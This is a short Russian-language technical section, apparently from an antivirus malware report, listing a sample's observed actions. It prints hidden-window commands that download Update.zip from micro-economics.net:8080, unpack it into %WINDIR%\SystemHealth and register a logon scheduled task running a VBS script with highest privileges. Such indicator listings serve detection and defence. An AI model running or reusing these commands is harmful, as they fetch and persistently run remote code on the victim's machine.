Техническая информация
- <SYSTEM32>\tasks\syscheck
- DNS ASK mi####economics.net
- '<SYSTEM32>\cmd.exe' /c mkdir %WINDIR%\SystemHealth (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c curl -o %WINDIR%\SystemHealth\Update.zip -L http://micro-economics.net:8080/downloadables/Update.zip (со скрытым окном)
- '<SYSTEM32>\curl.exe' -o %WINDIR%\SystemHealth\Update.zip -L http://micro-economics.net:8080/downloadables/Update.zip
- '<SYSTEM32>\cmd.exe' /c tar -xf %WINDIR%\SystemHealth\Update.zip -C %WINDIR%\SystemHealth (со скрытым окном)
- '<SYSTEM32>\tar.exe' -xf %WINDIR%\SystemHealth\Update.zip -C %WINDIR%\SystemHealth
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "SysCheck" /tr "wscript %WINDIR%\SystemHealth\Update\win32check.vbs" /sc onlogon /rl highest /f (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /tn "SysCheck" /tr "wscript %WINDIR%\SystemHealth\Update\win32check.vbs" /sc onlogon /rl highest /f